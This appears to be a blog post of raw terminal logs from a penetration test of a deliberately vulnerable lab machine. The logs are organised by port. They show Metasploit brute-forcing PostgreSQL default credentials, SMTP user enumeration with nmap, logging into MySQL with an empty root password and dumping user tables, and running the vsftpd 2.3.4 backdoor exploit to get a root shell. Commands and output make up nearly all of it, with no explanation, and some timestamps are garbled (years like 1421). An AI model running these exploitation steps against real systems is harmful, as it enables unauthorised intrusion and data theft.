[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'password'

[-] Remote-IP-Address:5432 Postgres - [11/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [12/21] - Trying username:'' with password:'admin' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: '':'admin'

[-] Remote-IP-Address:5432 Postgres - [12/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [13/21] - Trying username:'scott' with password:'tiger' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'tiger'

[-] Remote-IP-Address:5432 Postgres - [13/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [14/21] - Trying username:'scott' with password:'postgres' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'postgres'

[-] Remote-IP-Address:5432 Postgres - [14/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [15/21] - Trying username:'scott' with password:'password' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'password'

[-] Remote-IP-Address:5432 Postgres - [15/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [16/21] - Trying username:'scott' with password:'admin' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'scott':'admin'

[-] Remote-IP-Address:5432 Postgres - [16/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [17/21] - Trying username:'admin' with password:'tiger' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'tiger'

[-] Remote-IP-Address:5432 Postgres - [17/21] - Username/Password failed.

[*] Remote-IP-Address:5432 Postgres - [18/21] - Trying username:'admin' with password:'postgres' on database 'template1'

[-] Remote-IP-Address:5432 Postgres - Invalid username or password: 'admin':'postgres'

[-] Remote-IP-Address:5432 Postgres - [18/21] - Username/Password failed.

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(postgres_login) >

root@bt:~# psql -h Remote-IP-Address -U postgres -W

Password for user postgres: postgres

psql (8.4.8, server 8.3.1)

WARNING: psql version 8.4, server version 8.3.

Some psql features might not work.

SSL connection (cipher: DHE-RSA-AES256-SHA, bits: 256)

Type "help" for help.

postgres=#

----------------------------------------------------------------------------------

port 25 - smtp

root@bt:~# nmap --script smtp-enum-users.nse -p 25,465,587 IP-Address

Starting Nmap 6.01 ( http://nmap.org ) at 1421-11-21 09:57 GMT

Nmap scan report for IP-Address

Host is up (0.00082s latency).

PORT STATE SERVICE

25/tcp open smtp

| smtp-enum-users:

| root

| admin

| administrator

| webadmin

| sysadmin

| netadmin

| guest

| user

| web

|_ test

465/tcp closed smtps

587/tcp closed submission

MAC Address: 01:02:03:04:05:06 (Micky Computer Systems)

----------------------------------------------------------------------------------

port 3306 - mysql (linux)

root@bt:/usr/local/share/nmap/scripts# nmap -p 3306 --script mysql-empty-password.nse External-IP-Address

Starting Nmap 6.25 ( http://nmap.org ) at 1741-01-04 17:19 GMT

Nmap scan report for External-IP-Address

Host is up (0.00053s latency).

PORT STATE SERVICE

3306/tcp open mysql

| mysql-empty-password:

|_ root account has empty password

MAC Address: 01:02:03:04:05:06 (Micky Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 16.61 seconds

root@bt:/usr/local/share/nmap/scripts# mysql --host=External-IP-Address

Welcome to the MySQL monitor. Commands end with ; or \g.

Your MySQL connection id is 13

Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Oracle is a registered trademark of Oracle Corporation and/or its

affiliates. Other names may be trademarks of their respective

owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;

+--------------------+

| Database |

+--------------------+

| information_schema |

| dvwa |

| metasploit |

| mysql |

| owasp10 |

| tikiwiki |

| tikiwiki195 |

+--------------------+

7 rows in set (0.01 sec)

mysql> use dvwa;

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;

+----------------+

| Tables_in_dvwa |

+----------------+

| guestbook |

| users |

+----------------+

2 rows in set (0.01 sec)

mysql> SELECT * FROM users;

+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+

+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+

| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | http://IP-Address/dvwa/hackable/users/1337.jpg |

+---------+------------+-----------+---------+----------------------------------+------------------------------------------------------+

5 rows in set (0.00 sec)

mysql>

mysql> use owasp10

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A

Database changed

mysql> show tables;

+-------------------+

| Tables_in_owasp10 |

+-------------------+

| accounts |

| blogs_table |

| captured_data |

| credit_cards |

| hitlog |

| pen_test_tools |

+-------------------+

6 rows in set (0.00 sec)

mysql> SELECT * FROM accounts;

+-----+----------+--------------+-----------------------------+----------+

+-----+----------+--------------+-----------------------------+----------+

+-----+----------+--------------+-----------------------------+----------+

16 rows in set (0.18 sec)

mysql>

----------------------------------------------------------------------------------

port 21 - FTP (linux)

root@bt:~# nmap -sC -sT -v IP-Address

PORT STATE SERVICE

21/tcp open ftp

|_ftp-anon: Anonymous FTP login allowed (FTP code 230)

------------------------------------------------

msf auxiliary(vnc_login) > use auxiliary/scanner/ftp/ftp_version

msf auxiliary(ftp_version) > set rhosts IP-Address

msf auxiliary(ftp_version) > run

[*] IP-Address:21 FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

------------------------------------------------

msf auxiliary(ftp_version) > search vsFTPd

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 00:00:00 UTC excellent VSFTPD v2.3.4 Backdoor Command Execution

------------------------------------------------

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf exploit(vsftpd_234_backdoor) > set rhost IP-Address

msf exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)

[*] USER: 331 Please specify the password.

[+] Backdoor service has been spawned, handling...

[+] UID: uid=0(root) gid=0(root)

[*] Found shell.

[*] Command shell session 1 opened (IP-Address:44113 -> IP-Address:6200) at 1421-01-12 01:45:51 +0000

ls -l

drwxr-xr-x 2 root root 4096 May 13 1421 bin

drwxr-xr-x 4 root root 1024 May 13 1421 boot

lrwxrwxrwx 1 root root 11 Apr 28 1421 cdrom -> media/cdrom

drwxr-xr-x 14 root root 13480 Jan 25 05:46 dev

drwxr-xr-x 95 root root 4096 Jan 25 05:47 etc

drwxr-xr-x 6 root root 4096 Apr 16 1421 home

.::Tools[K]id::.

Search

Exploits - Port Number

0 comments:

Post a Comment

Follow Me

Total Pageviews

Category

Daftar Isi

Post Populer